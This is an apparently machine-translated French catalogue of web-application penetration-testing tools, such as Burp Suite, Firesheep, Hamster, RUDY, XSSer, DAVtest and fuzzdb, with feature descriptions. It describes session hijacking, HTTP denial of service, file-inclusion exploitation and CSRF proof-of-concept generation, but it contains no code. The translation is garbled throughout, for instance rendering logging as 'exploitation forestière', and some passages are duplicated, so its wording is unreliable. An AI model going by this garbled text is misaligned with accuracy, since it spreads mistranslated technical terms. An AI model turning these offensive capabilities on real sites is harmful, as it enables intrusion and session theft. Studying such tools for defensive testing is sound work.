Tout ce que vous devez faire est de télécharger et d’ouvrir le fichier zip, puis extrayez le fichier war dans le répertoire des webapps votre moteur de servlets favori.

Ensuite, pointez votre navigateur sur (par exemple) http://localhost:8080/bodgeit

Vous pouvez trouver plus facile de trouver des vulnérabilités en utilisant un outil de test stylo.

Si vous n’avez pas un favori, je vous le recommande le Zed Attack Proxy (pour lequel je suis le chef de projet).

Le Bodge Il Store incluent les vulnérabilités majeures suivantes:

* Cross Site Scripting
* Injection SQL
* Cachée (mais non protégés) contenu
* Faux Croix-Site Request
déboguer le code *
Références * Objet insécurité
vulnérabilités * logique de demande

Navigateur Fuzzer
Navigateur Fuzzer 3 est conçu comme un cadre hybride / fuzzer autonome; les modules qu’il utilise sont extensibles, mais aussi fortement intégré dans le noyau. BF3 peut être utilisé via la ligne de commande pour régler tous les drapeaux nécessaires pour chaque opération de fuzzing. Après l’initialisation, BF3 crée des cas de test dans un système numérotées. Le fuzzing est automatisée par le biais du navigateur en utilisant la méthode d’actualisation. Si l’erreur est détectée, les journaux du serveur peuvent donner une idée du scénario de test délinquance.


– CSS Fuzz, DOM, HTML, JavaScript et XML
– Avec et sans assistance Modes Fuzzing
– Génération 7 Fuzzing Oracle
– Générateur aléatoire de données
– Mutation Fuzzing moteur

Browser Rider
BrowserRider est un cadre intégré pour exploiter les vulnérabilités par cross site scripting. Son but est de prouver l’impact de cette vulnérabilité lors d’une évaluation de la vulnérabilité.

Burp Suite
Burp Suite est une plate-forme intégrée pour attaquer les applications web. Il contient tous les outils Burp avec de nombreuses interfaces entre eux visant à faciliter et accélérer le processus d’attaquer une application. Tous les outils partagent le même cadre robuste pour la gestion des requêtes HTTP, la persistance, l’authentification, les proxies amont, l’exploitation forestière, d’alerte et d’extensibilité.

Burp Suite vous permet de combiner des techniques manuelles et automatiques d’énumérer, d’analyser, de numérisation, d’attaque et exploiter des applications web. Les différents outils Burp collaborer efficacement pour partager des informations et permettre les résultats identifiés dans un seul outil pour former la base d’une attaque à l’aide d’un autre.

Principales caractéristiques propres à l’Burp Suite comprennent:

* L’analyse détaillée et le rendu des demandes et réponses.
* One-click transfert des demandes intéressante entre les outils.
* L’information Plan du site montrant accumulés sur les applications cibles dans l’arbre et sous forme de tableau.
* Possibilité de «passivement» une demande d’araignée d’une manière non-intrusive, à toutes les demandes provenant de navigateur de l’utilisateur.
* Suite au niveau configuration champ cible, de conduite de nombreuses actions outil individuel.
* Entièrement véritable scanner de vulnérabilités web. [Version Pro uniquement]
* Possibilité de sauvegarder et de restaurer l’état. [Version Pro uniquement]
* Analyse compatible FIPS statistiques de hasard jeton de session.
* Utilitaires pour le décodage et la comparaison des données d’application.
* Une gamme d’outils de l’engagement, pour rendre votre travail plus rapide et plus efficace. [Version Pro uniquement]
* Fonction de recherche Suite à l’échelle. [Version Pro uniquement]
* Support des clients personnalisés et des certificats SSL serveur.
* Extensibilité via l’interface IBurpExtender.
* Configurés de manière centralisée les paramètres de proxy en amont, le web et l’authentification de proxy, et l’exploitation forestière.
* Outils peut fonctionner dans une seule fenêtre à onglets, ou être détachés dans des fenêtres individuelles.
* Fonctionne dans les deux sous Linux et Windows.

CAT est conçu pour faciliter la pénétration de l’application web manuel d’essai pour plus complexes, exigeant des tâches de test d’applications. Il élimine certains des éléments les plus répétitives du processus de test, le testeur permettant de se concentrer sur les demandes individuelles, leur permettant ainsi d’effectuer un test beaucoup plus approfondie. Conceptuellement, elle est semblable à d’autres proxies disponibles commercialement et open source, mais CAT fournit un ensemble riche fonctionnalité et une plus grande performance, combinée à une interface utilisateur plus intuitive.

Il ya un certain nombre de différences entre les CAT et les procurations Web actuellement disponibles. Ils comprennent:

CAT utilise le moteur de rendu d’Internet Explorer pour HTML représentation exacte
Il supporte de nombreux types de conversions de texte, notamment: URL, Base64, Hex, Unicode, HTML / XML, SQL et JavaScript sans les guillemets
Il propose une offre intégrée d’Injection SQL et XSS détection
Les procurations synchronisée pour l’authentification et la vérification d’autorisation
Meilleure performance en raison de la mise en cache de connexion HTTP
Version SSL et de dames Cipher utilisant OpenSSL
Plus de flexibilité pour l’importation de projets / exportation des grumes et des économies
Interface à onglets permet d’utiliser plusieurs outils à la fois par exemple répéteurs multiples et différents journaux
La possibilité de répéter et de modifier une séquence de requêtes (particulièrement utile dans les essais SSO)
C’est gratuit!

CEWL (générateur de liste de mots) est une application ruby ​​que les araignées une URL donnée à une profondeur déterminée, éventuellement après les liens externes, et retourne une liste de mots qui peuvent ensuite être utilisés pour cracker comme John the Ripper. CEWL se prononce « cool ».

Clickjacking outil

Clickjacking est un premier terme introduit par Jeremiah Grossman et Robert Hansen en 2008 pour décrire une technique par laquelle un attaquant trucs un utilisateur à effectuer certaines actions sur un site Internet en masquant les éléments cliquables dans une iframe invisible.

Bien qu’il ait fait deux ans que le concept a été introduit, la plupart des sites n’ont toujours pas mis en œuvre une protection efficace contre clickjacking. En partie, cela peut être dû à la difficulté de visualiser comment fonctionne la technique dans la pratique.

Ce nouvel outil basé sur un navigateur permet à un utilisateur d’expérimenter avec clickjacking techniques en utilisant le point-and-click de choisir visuellement les différents éléments dans une page Web d’être la cible. L’outil permet également de techniques clickjacking plusieurs prochaine génération à être utilisé, tel que présenté dans Paul Stone Blackhat Europe 2010 parler.

Parmi les caractéristiques de ce nouvel outil sont:

* Utilisez le point-and-click pour sélectionner les zones d’une page d’être la cible
* Prise en charge technique de la nouvelle ‘injection champ de texte  »
* Prise en charge technique de «l’extraction de contenu» de la nouvelle
replay «mode visible» * permettant à un utilisateur de voir comment fonctionne la technique derrière la science
replay ‘mode caché’ * permet les mêmes étapes pour être rejoué d’une manière cachée, simulant une attaque clickjacking réel.

L’outil est actuellement à un stade précoce beta, et fonctionne mieux dans Firefox 3.6. Prise en charge complète pour les autres navigateurs suivront sous peu. Pour de plus amples renseignements, s’il vous plaît consultez le fichier Lisezmoi.txt dans l’outil téléchargeable.

Darkjumper Développé par: mywisdom & gunslinger_

Cet outil va essayer de trouver tous les sites Web qui hébergent sur le même serveur sur votre cible, puis de vérifier chaque vulnérabilité de chaque site qui à le même serveur

Fonctions de darkjumper:
1. recensement de l’utilisateur deviner sur la base du procès 4-8 signes prélevés sur chaque nom de site qui les accueillent sur le même serveur.
2. Scan pour l’injection sql, l’inclusion de fichiers locaux, l’inclusion de fichiers distants et aveugle d’injection sql sur tous les sites sur le même serveur.
3. CGI et le chemin de balayage.
4. Port-la numérisation
5. Auto-bruteforcing après l’énumération d’utilisateur
6. Auto-injecteur – trouvez colonne auto (mysql) s’il est reconnu bug trouvé mysql
7. Proxy ajouté
8. Verbocity ajouté
9. IP ou un proxy checker et GeoIP utile pour vérifier votre adresse IP ou votre travail proxy ou non.

Un outil simple perl qui détecte plusieurs Directory Traversal Vulnerabilities sur les serveurs HTTP / FTP. Cette version a AttackDB actuellement: 871 charges utiles parcours (et plus!).

* Détecte les vulnérabilités traversée de répertoire à distance sur HTTP / systèmes serveur FTP.
* Actuellement, la base de données traversée détient 881 charges utiles attaque. Utilisez l’option la mise à jour à effectuer une mise à jour en ligne frais.
* Les chèques DotDotPwn la présence de boot.ini sur les systèmes vulnérables par le biais des vulnérabilités traversée de répertoires, il est donc supposé que les systèmes testés sont
Basé sur Windows serveurs HTTP / FTP.

extension pour Firefox qui démontre session HTTP détournement attaques

Lorsque vous vous connectez à un site Web vous démarrez généralement en soumettant votre nom d’utilisateur et mot de passe.Le serveur vérifie ensuite si un compte correspondant à cette information existe et si oui, répond de nouveau à vous avec un «cookie» qui est utilisé par votre navigateur pour toutes les demandes ultérieures.
Elle est très fréquente pour les sites à protéger votre mot de passe par le chiffrement de la connexion initiale, mais étonnamment rare pour des sites Web pour crypter tout le reste. Cela laisse le cookie (et l’utilisateur) vulnérables. détournement de session HTTP (parfois appelé «sidejacking »), c’est quand un attaquant obtient une prise de cookies d’un utilisateur, leur permettant de faire quoi que ce soit l’utilisateur peut faire sur un site particulier. Dans un réseau sans fil ouvert, les cookies sont essentiellement crié dans l’air, faisant de ces attaques extrêmement facile.

Firesheep est gratuit, open source, et est désormais disponible pour Mac OS X et Windows. le support de Linux est sur le chemin.
Des sites Web ont la responsabilité de protéger les personnes qui dépendent de leurs services. Ils ont fait fi de cette responsabilité depuis trop longtemps, et il est temps pour tout le monde à réclamer un Web plus sûr. Mon espoir est que Firesheep aidera les utilisateurs de Windows.

Vitesse-sol est un open-source extension Firefox pour les testeurs de sécurité des applications web présenté à la DC OWASP AppSec 2009. Il vous permet de manipuler l’interface utilisateur de l’application Web pour éliminer les limitations gênantes et contrôles côté client qui interfèrent avec le test de pénétration des applications web.

Hamster est un outil pour la session HTTP avec détournement passive sniffing. Il le fait, en reniflant sur un réseau, de capturer les cookies de session, de les importer dans le navigateur pour vous permettre de détourner leur session! session HTTP détournement ou SideJacking est l’endroit où vous détourner une session Web existant avec un service distant en interceptant et en utilisant les informations d’identification (normalement cookies de session) qui a identifié à l’utilisateur de ce serveur spécifique.

JBroFuzz ​​est un fuzzer application web pour les demandes faites via HTTP et / ou HTTPS. Son but est de fournir une seule application portable qui offre protocole web stable fuzzing capacités.

Notes de mise à (2,3):
Plusieurs instances peuvent désormais enregistrer des données dans des répertoires différents lancement, en vertu: Préférences -> Annuaire Sites
Gardez Histoire de dir précédente: Fichier -> Enregistrer sous -> Enregistrer, Fichier -> Ouvrir, Fichier
Correction fonctionnalité de recherche lors de l’affichage des réponses fuzzing (thx Markus!)
Ajout d’un bouton de swap, dans la fenêtre Encoder, plus amis
Encoder / Hash est maintenant aussi un pot standalone / exe
Ajouté clic droit encoder / décoder fonctionnalité dans l’onglet Fuzzer – Demande de texte du panneau
Ajout d’un standalone jbrofuzz-core-2.3.jar bibliothèque de fuzzing API

Notes de version (2.1):

– Ctrl + M pour charger vos propres fuzzers partir d’un fichier jbrf.
– Suppression de l’ajout de sauts de ligne par défaut à la fin de chaque requête, assurez-vous de savoir ce que vous fuzzing!
– On The Wire: option clic droit, clair et aussi de choisir de voir les demandes et / ou des réponses
– Ajout d’ASCII 85 (045-A85-RFC) et imprimables ASCII 94 (046-A94-CHR) fuzzers.
– Base32 et zBase32 Encode / Decode fonctionnalité ajoutée
– JBroFuzz ​​enregistre désormais dans le journal quotidien (thnx Ranulf!)
– Vous pouvez charger vos charges personnalisé en plaçant un fichier nommé fuzzers.jbrf dans votre répertoire de travail.
– Ajout de 3 nouvelles fuzzers extension de fichier (thnx Adam)

Les composants de JBroFuzz ​​sont tous intégrés dans une seule fenêtre et peut être consulté par les différents onglets. Ces onglets sont les suivants:


* L’onglet fuzzing est l’onglet principal de JBroFuzz, responsable de toutes les opérations de fuzzing réalisée sur le réseau. En fonction de la charge utile fuzzer sélectionné, il crée les données malformées pour chaque demande, il met sur le fil et écrit la réponse à un fichier.


* L’onglet graphique est responsable pour la représentation graphique (dans une variété de formes), les réponses reçues pendant fuzzing. Cet onglet peut offrir une indication claire d’une réponse qui est différente du reste reçu, une indication de l’examen complémentaire.


* L’onglet charges utiles est une collection de fuzzers avec leurs charges correspondant qui peut être utilisé pendant fuzzing. Les charges utiles sont ajoutés à la demande dans l’onglet fuzzing; une vision plus claire de ce que les charges utiles sont disponibles, la façon dont ils sont regroupés et quelles sont les propriétés de chaque fuzzer a peut être vu dans cet onglet.


* L’onglet têtes est une collection de têtes navigateur qui peut être utilisé pendant fuzzing. En-têtes sont obtenus à partir de différents navigateurs sur les différentes plates-formes et systèmes d’exploitation.


* L’onglet en-têtes est une collection de têtes navigateur qui peut être utilisé pendant fuzzing. En-têtes sont obtenus à partir de différents navigateurs sur les différentes plates-formes et systèmes d’exploitation. Cet onglet est fourni, comme beaucoup d’applications web répondent différemment aux différentes attaques d’emprunt d’identité navigateur.


* L’onglet système représente l’exploitation de la console de JBroFuzz ​​à l’exécution. Ici, vous pouvez accéder à des informations d’exécution Java, voir toutes les erreurs qui pourraient se produire et aussi suivre le fonctionnement en termes d’événements étant connecté.

Ce script est utilisé pour prendre le plus beneficts du fichier local comprennent la vulnérabilité dans le serveur web

Un nouvel outil simple a été récemment publié, qui se concentre uniquement sur les attaques LFI.


* Automatiquement trouver la racine du système de fichiers
* Les fichiers par défaut de détection en dehors du dossier web
* Les tentatives visant à détecter les mots de passe dans les fichiers
* Prend en charge l’authentification de base
* Peut utiliser octet nul de contourner certains contrôles
* Rédiger un rapport de l’analyse d’un fichier

Mantra est un rêve devenu réalité. Il s’agit d’une collection d’outils libres et open source intégré à un navigateur web, qui peut devenir très pratique pour les étudiants, les testeurs de pénétration, les développeurs d’applications web, professionnels de la sécurité, etc Il est portatif, prêt-à-l’emploi, compact et suit le véritable esprit des logiciels libres et open source. Mantra est un cadre de sécurité qui peut être très utile dans l’exercice de tous les cinq phases d’attaques, dont la reconnaissance, de numérisation et de recensement, l’accès, l’escalade de privilèges, de maintenir l’accès, et brouiller les pistes. En dehors de cela il contient également un ensemble d’outils pour les développeurs Web et les débogueurs de code qui rend très pratique à la fois pour la sécurité offensive et défensive des tâches de sécurité connexes.

Mantra est lite, flexible, portable et facile à utiliser avec une interface utilisateur graphique agréable. Vous pouvez le garder dans les cartes mémoire, lecteurs flash, CD / DVD, etc Il peut être exécuté en mode natif sur Linux, Windows et Mac. Il peut également être installé sur votre système en quelques minutes. Mantra est absolument gratuit et ne prend pas de temps pour vous de mettre en place.

Netsparker ® ​​peut détecter et de signaler les problèmes de sécurité tels que l’injection SQL et Cross-Site Scripting (XSS) dans toutes les applications web indépendamment de la plate-forme et de la technologie dont ils sont construits.

unique de détection Netsparker et techniques d’exploitation lui permet d’être morts précises dans les rapports où il est le premier et le seul faux positif web gratuit de l’application de balayage de sécurité

R U Dead Yet
RU-Dead-Pourtant, à court ou RUDY, met en œuvre les génériques HTTP DoS attaque via long observations champ de formulaire. La théorie de l’attaque est décrit dans l’article suivant:

Cet outil fonctionne avec un menu interactif de la console, détection automatique de formes dans les URL donnée, et permettant à l’utilisateur de choisir les formulaires et les champs de formulaire sont souhaitables à utiliser pour l’attaque POST. En outre, l’outil propose d’exécution sans assistance en fournissant les paramètres nécessaires dans un fichier de configuration.

Sahi est un outil d’automatisation pour tester les applications web. Sahi injecte javascript dans les pages web en utilisant un proxy et le javascript permet d’automatiser les applications Web.

Sahi est un outil convivial testeur. Il résumés en plus de difficultés que les testeurs face tout en automatisant les applications web. Certains traits saillants incluent un excellent graveur, plate-forme et l’indépendance navigateur, XPaths, aucune période d’attente, la lecture multi-thread, une excellente interaction Java et au reporting intégré.


* Le navigateur et système d’exploitation indépendant
* Enregistreur puissant qui fonctionne sur les navigateurs
* Spy objet puissant
* API simple et intuitive
* Javascript basé scripts pour le contrôle de la bonne programmation
* Version contrôlables scripts basé sur du texte
* Dans les rapports de construction
* Dans la lecture de construction multi-thread ou en parallèle des tests
* Tests n’avez pas besoin de la fenêtre du navigateur pour être en bref
* Commande en ligne et la fourmi de soutien pour l’intégration dans l’élaboration de processus
* Prise en charge proxy externe, HTTPS, 401 & NTLM authentification
popups navigateur * Prise en charge et de boîtes de dialogue modales
* Prise en charge d’AJAX et des applications web très dynamique
* Scripts très robuste
* Fonctionne sur des applications avec des identifiants aléatoires auto-générés
* Très léger et extensible
* Prise en charge des tests pilotés par les données. Peut se connecter à la base de données, fichier Excel ou CSV.
* Possibilité d’invoquer n’importe quelle bibliothèque Java à partir de scripts


Jeux de cadres * / pages avec frames / iframes chargement des pages de plusieurs domaines n’est pas pris en charge. Sahi ne peut pas gérer les pages qui ont d’autres pages de différents domaines noyés dans la masse en utilisant les iframes ou cadres. Donc, vous ne pouvez pas avoir une page de ayant une iframe sur une page de Notez que ce n’est pas la même que la commutation entre des domaines, où vous naviguez d’une page à une page, qui travaillera en Sahi.
* Téléchargement de fichiers champ ne sera pas peuplée sur les navigateurs pour la vérification javascript. Téléchargement de fichiers lui-même fonctionne bien

Notre connaissance approfondie des questions de sécurité, les nouvelles technologies Web 2.0 comme AJAX, les technologies traditionnelles de Web, et les langages de programmation Web tels que PHP, nous a permis de livrer exactement ce que nous avons cherché à fournir – à l’application web plus riche en fonctionnalités et avancées scanner de sécurité disponibles à ce jour.

SandCat combine Syhunt de l’état de l’art-, multi-processus d’analyse des technologies de la langue incroyablement rapide LUA pour effectuer à distance scans sécurité des applications web. Bien que spidering une vulnérabilité site web et de la chasse, SandCat émule un moderne, navigateur Web HTML 5-courant. Téléchargez-le et regardez par vous-même!

WSFuzzer est un programme sous licence LGPL, écrit en Python, qui cible actuellement des services Web. Dans la version actuelle HTTP en fonction des services SOAP sont la cible principale. Cet outil a été créé sur la base, et d’automatiser, de certains manuels du monde réel SOAP stylo travail d’essai. Cet outil n’est pas destiné à être un remplacement pour une analyse manuelle solides de l’homme. S’il vous plaît consulter WSFuzzer comme un outil pour augmenter l’analyse effectuée par des professionnels compétents et bien informés. Services Web ne sont pas négligeables dans la nature afin expertise dans ce domaine est un must pour les essais stylo approprié.


https: / / / adamdoupe / WackoPicko
WackoPicko est une application web vulnérable utilisé pour tester des applications web scanners de vulnérabilité. – Lire la suite

Watcher est un outil d’exécution passive-analyse pour HTTP applications Web. Être passive signifie qu’il ne sera pas endommager les systèmes de production, il est complètement sûr pour employer dans le calcul de Cloud, hébergement mutualisé, hébergement dédié et des environnements. Watcher détecte les problèmes de sécurité des applications Web ainsi que les problèmes de configuration opérationnelle. Watcher fournit pen-testers hot-spot de détection de vulnérabilités, les développeurs de tests de validité rapide, et l’audit vérificateurs de la conformité PCI. Il cherche des questions liées à mashups, des charges utiles contrôlé par l’utilisateur (XSS potentiels), des biscuits, des commentaires, des en-têtes HTTP, SSL fuites referrer, Flash, Silverlight, la divulgation d’informations, Unicode, et plus

WebCruiser – Web Vulnerability Scanner, un outil web compact mais puissant de balayage de sécurité qui vous aide dans l’audit de votre site! Il a un scanner de vulnérabilité et d’une série d’outils de sécurité.

Il peut prendre en charge le site de numérisation ainsi que POC (prooving of concept) de vulnérabilités web: les injections SQL, Cross Site Scripting, injection XPath, etc Donc, WebCruiser est également un outil d’injection SQL automatique, un outil d’injection XPath, et un Cross Site Scripting outil!

* Sur chenilles (annuaires de sites et fichiers);
* Vulnerability Scanner (Injection SQL, Cross Site Scripting, injection XPath, etc);
* POC (Proof of Concept): Injection SQL, Cross Site Scripting, injection XPath, etc;
* GET / Post / Cookie injection;
* SQL Server: PlainText / Union / Injection aveugles;
MySQL/DB2/Access *: Union / Injection aveugles;
Oracle *: Union / Blind / Injection CrossSite;
Données Post * Renvoyer;
* Recherche d’entrée de l’administration;
Delay Time * pour l’injection de la recherche;
Auto * Obtenez Cookie à partir du navigateur Web pour l’authentification;
* Rapport de sortie.

WebScarab NG

https: / / / p / WebScarab-ng /
WebScarab-NG est une réécriture complète de l’ancienne application WebScarab, avec un accent particulier sur la prise de l’application plus conviviale.

WebScarab est un cadre d’analyse des applications qui communiquent en utilisant les protocoles HTTP et HTTPS. Il est écrit en Java, et est donc portable sur de nombreuses plateformes. WebScarab a plusieurs modes de fonctionnement, mis en œuvre par un certain nombre de plugins. Dans son utilisation la plus courante, WebScarab fonctionne comme un proxy d’interception, permettant à l’opérateur d’examiner et de modifier les demandes créées par le navigateur avant de les envoyer au serveur, et d’examiner et de modifier les réponses renvoyées par le serveur avant qu’ils soient reçus par le navigateur .WebScarab est capable d’intercepter les communications HTTP et HTTPS. L’opérateur peut également examiner les conversations (demandes et réponses) qui ont traversé WebScarab.

Websecurify Security Testing cadre identifie les failles de sécurité Web par l’utilisation du navigateur d’automatisation, la découverte et fuzzing technologies. Le cadre est écrit en JavaScript et exécute avec succès dans de nombreuses plateformes, y compris les navigateurs modernes avec l’appui de HTML5, xulrunner, xpcshell, Java, V8 et d’autres.

»Est un site Web et Websecurify web2.0 initiative de sécurité spécialisée dans les recherches sur des questions de sécurité et de la construction de la prochaine génération d’outils à la défaite et de protéger les technologies du web. »

Cette version contient les améliorations suivantes:

des améliorations d’interface utilisateur *
* Plus rapide, plus stable plateforme de test
* Le développement d’extensions Amélioration de l’API
* Moins de faux positifs
* Des gains importants tests de performance
* Prise de captures d’écran automatique vulnérabilité
* Intégration avec le Réseau Websecurify
* Amélioration des stratégies de fuzzing
* Perspectives d’espace de travail
* L’application intégrée et l’extension mises à jour automatiques

XSSer est un outil open source tests de pénétration qui automatise le processus de détection et d’exploitation injections XSS contre les différentes applications.

Il contient plusieurs options pour essayer de contourner certains filtres, et de diverses techniques spéciales d’injection de code.

XSSploit est un multi-plate-forme de type Cross-Site Scripting scanner et exploiteur écrit en Python. Il a été développé pour aider à la découverte et l’exploitation des vulnérabilités XSS dans les missions de tests de pénétration.

Quand il est utilisé contre un site Web, XSSploit rampe premier tout le site et identifie les formes rencontrées. Il analyse ensuite ces formes de détecter automatiquement les vulnérabilités existantes XSS ainsi que leurs principales caractéristiques.

Les vulnérabilités ont été découvertes peuvent ensuite être exploitée en utilisant l’exploit moteur de génération de XSSploit. Cette fonctionnalité extensible permet de choisir le comportement souhaité exploiter et génère automatiquement le lien correspondant HTML intégrant l’exploit de charge utile.

XSSploit est livré avec plusieurs fichiers:

– Le fichier principal. Contient le noyau XSSploit et l’interface de ligne de commande.
– L’interface utilisateur graphique.
– Extensions.txt: araignée de XSSploit explore les pages Web en utilisant les expressions rationnelles. Ce fichier contient les extensions de fichier sur le serveur qui doit être spidered. Pour ajouter une nouvelle extension, il suffit d’ajouter une nouvelle ligne dans ce fichier et écrivez votre extension. Ne pas oublier le point.
– Exploits.xml: La base de données exploits. S’il vous plaît se référer à ce fichier pour créer de nouveaux exploits.
– Report.xsl: Cette feuille de style est un exemple très basique sur la façon d’afficher le rapport généré par XSSploit. Placez ce fichier dans le même dossier que le rapport XML et pointez votre navigateur sur le fichier de rapport pour voir le rapport.

Acunetix Web Vulnerability Scanner (WVS) est une application web automatisée des tests de sécurité outil que les applications Web de votre audits en vérifiant les vulnérabilités exploitables piratage. scans automatisés peuvent être complétées et vérifiées par recoupement avec la variété d’outils manuels pour permettre site Web complet et les tests de pénétration des applications web.

DAVtest tests WebDAV serveurs en téléchargeant les fichiers de test exécutable, puis (éventuellement) le téléchargement de fichiers qui permettent l’exécution de commandes ou d’autres actions directement sur la cible. Il est destiné aux testeurs de pénétration de déterminer rapidement et facilement si elle est activée services DAV sont exploitables.

DAVtest prend en charge:

* Envoi automatique d’exploiter les fichiers
* Randomisation automatique du répertoire pour aider à cacher des fichiers
* Envoyez des fichiers texte et essayer de MOVE pour nom de l’exécutable
* De base et l’autorisation Digest
* Nettoyage automatique des fichiers téléchargés
* Envoyer un fichier arbitraire

Fiddler est un proxy Web Débogage qui enregistre toutes les HTTP (S) le trafic entre votre ordinateur et l’Internet. Fiddler vous permet d’inspecter tous les HTTP (S) de la circulation, les points d’arrêt ensemble, et « violon » avec les données entrant ou sortant. Fiddler comprend un sous-système de script puissant basé sur les événements, et peut être étendu en utilisant n’importe quel langage. NET.

Fiddler est un freeware et peut déboguer le trafic à partir de pratiquement n’importe quelle application, y compris Internet Explorer, Mozilla Firefox, Opera, et beaucoup plus.


FIMAP est un outil peu python qui peuvent trouver, préparer, d’audit, d’exploiter et même Google automatiquement pour locaux et distants bugs inclusion de fichiers dans webapps. FIMAP devrait être quelque chose comme sqlmap seulement pour les bugs LFI / RFI au lieu de l’injection SQL. Il est actuellement en cours de développement mais il est utilisable.

Le but de FIMAP est d’améliorer la qualité et la sécurité de votre site web.

fuzzdb est un ensemble complet de séquences connues modèle d’attaque, des endroits prévisibles, et les messages d’erreur pour le test force intelligente brute et l’identification condition d’exploiter des applications web.

De nombreux mécanismes d’attaque utilisés pour exploiter les différentes plates-formes de serveur web et applications sont déclenchées par des méta-caractères particuliers qui sont observées dans plus d’un avis de sécurité du produit. fuzzdb est une base de données des modèles d’attaque connue pour avoir causé exploiter des conditions dans le passé, classées par type d’attaque, la plate-forme, et l’application.

En raison de la popularité d’un petit nombre de types de serveur, les plates-formes et des formats de paquets, des ressources telles que les fichiers journaux et des répertoires administratifs sont généralement situés dans un petit nombre d’endroits prévisibles. Une base de données complète de ceux-ci, triés par type de plateforme, fait fuzz force brute de tester une approche de type scalpel.

Depuis les erreurs du système contiennent des chaînes prévisible, fuzzdb contient des listes de messages d’erreur à l’encontre motif correspondant de sortie du serveur afin de faciliter la détection des défauts logiciels de sécurité.

Les sources primaires utilisées pour la recherche modèle d’attaque:

* La recherche de vieux exploits sur Internet pour les chaînes attaque répétable
* modèles de scanner raclage http journaux
* Divers livres, articles, blogs, mailing liste fils
* modèles glanés dans d’autres fuzzers open source et des outils pentest
* analyse des app installe par défaut
* Système de documentation de l’application et
messages d’erreur *

C’est comme un scanner non-automatisé, sans le scanner.

Si vous aimez fuzz-force de votre chemin dans trouver des vulnérabilités, les chances sont que vous aimerez iExploder. Il est inspiré du mangleme autre outil similaire pour trouver des problèmes de sécurité et de fiabilité dans les navigateurs web.

Il se nourrit le navigateur à l’étude avec un mauvais code HTML et CSS, afin de tester sa stabilité et sa sécurité. Il se nourrit en permanence les navigateurs de mauvaises données dans l’espoir qu’ils finiront par accident. Il a été conçu pour fonctionner pendant des heures, voire plusieurs jours jusqu’à ce que le plantage du navigateur.iExploder est disponible sous forme d’un harnais navigateur complet, le serveur web autonome ou d’un script CGI.

Quelques-unes de ses caractéristiques sont les suivantes:

* Tests tous les attributs HTML et CSS que Mozilla, Webkit et d’autres navigateurs prennent en charge
* Basic fuzzing pour les formats de médias (bmp, gif, ico, JNG, jpg, ogg, png, snd, svg, tiff, wav, XBM, XPM)
* Très manipulation du DOM de base fuzzing via JS
* En-tête HTTP fuzzing
* CSS Selector fuzzing
* Logic, dépassement de mémoire tampon, et les essais de chaîne de format
* Un nombre illimité de tests reproductibles
* Essais testcase séquentielle et aléatoire, avec la possibilité de reprendre (uniquement séquentiel)
* Outils pour aider à isoler le test s’est écrasé le navigateur, ainsi que trouver de l’information backtrace

est une mitmproxy SSL-capable, interceptant proxy HTTP. Il fournit une interface de console qui permet les flux de circulation doivent être inspectés et édité à la volée.

mitmdump est la version en ligne de commande mitmproxy, avec les mêmes fonctionnalités, mais sans fioritures. Pensez tcpdump pour HTTP.

* Intercepter et de modifier le trafic HTTP à la volée
* Sauvegarder les conversations HTTP pour les rejouer plus tard et l’analyse
* Replay fois clients et serveurs HTTP
* Apporter des modifications de script pour le trafic HTTP en utilisant Python
* Interception SSL certs généré à la volée

MonkeyFist est un outil qui crée des faux demande dynamique basée sur des données inter-domaines de fuite. L’outil construit alors une charge utile sur la base de données dans le fichier payloads.xml et l’envoie au navigateur de l’utilisateur. Cela peut inclure les données de session en contournant les mécanismes de protection pour Cross-Site Request Forgery.

Pinata est un script python qui va générer Proof of Concept CSRF HTML à partir de la requête HTTP.

faux Cross-Site Request, également connu comme une attaque en un seul clic ou à cheval session et en abrégé CSRF (mer-surf) ou XSRF, est un type de « malveillants exploitent d’un site Web où des commandes non autorisées sont transmises par un utilisateur que le site Web de fiducies . Pinata est un script python qui va générer Proof of Concept CSRF HTML à partir de la requête HTTP.

Vue d’ensemble:
– L’outil va générer une preuve de concept CSRF HTML donné une requête HTTP. Il vérifie automatiquement s’il s’agit d’un EEG ou une requête POST et avec une validation supplémentaire de la norme et POST « multipart / form POST.
– L’outil va alors créer un fichier HTML correspondant au type de la demande.
– L’EEG CSRF HTML comprend IMG SRC tag avec pour valeur l’URL à l’essai.
– Le POST CSRF HTML est créée avec auto présenter sous forme de script java avec les noms et les valeurs de la requête HTTP.

w3af est une application Web Attack et Cadre de vérification. L’objectif du projet est de créer un cadre pour trouver et exploiter les vulnérabilités des applications Web qui est facile à utiliser et à étendre.

WATOBO est destiné à permettre aux professionnels de la sécurité d’effectuer très efficace (semi-automatique) des audits de sécurité des applications Web. Nous sommes convaincus que l’approche semi-automatique est le meilleur moyen d’effectuer un audit précis et d’identifier la plupart des vulnérabilités.

WATOBO n’a pas de capacités d’attaque et est fournie à des fins juridiques audit de vulnérabilité que

WATOBO fonctionne comme un proxy local, semblable à WebScarab, Paros ou BurpSuite.

En outre, WATOBO soutient les contrôles passifs et actifs. Les contrôles passifs sont plus comme des fonctions de filtrage. Ils sont utilisés pour recueillir des informations utiles, par exemple, e-mail ou des adresses IP. Les contrôles passifs seront effectués pendant les activités de navigation normale. Aucune des demandes supplémentaires sont envoyées à l’application (web).

contrôles Active au lieu produira un nombre élevé de demandes (selon le module de contrôle) parce qu’ils ne la partie automatique de l’identification de la vulnérabilité, par exemple lors d’une analyse.

WATOBO est destiné à permettre aux professionnels de la sécurité d’effectuer très efficace (semi-automatique) des audits de sécurité des applications Web. Nous sommes convaincus que l’approche semi-automatique est le meilleur moyen d’effectuer un audit précis et d’identifier la plupart des vulnérabilités.

WATOBO n’a pas de capacités d’attaque et est fournie à des fins juridiques audit de vulnérabilité seulement.

WATOBO fonctionne comme un proxy local, semblable à WebScarab, Paros ou BurpSuite.

En outre, WATOBO soutient les contrôles passifs et actifs. Les contrôles passifs sont plus comme des fonctions de filtrage. Ils sont utilisés pour recueillir des informations utiles, par exemple, e-mail ou des adresses IP. Les contrôles passifs seront effectués pendant les activités de navigation normale. Aucune des demandes supplémentaires sont envoyées à l’application (web).

contrôles Active au lieu produira un nombre élevé de demandes (selon le module de contrôle) parce qu’ils ne la partie automatique de l’identification de la vulnérabilité, par exemple lors d’une analyse.

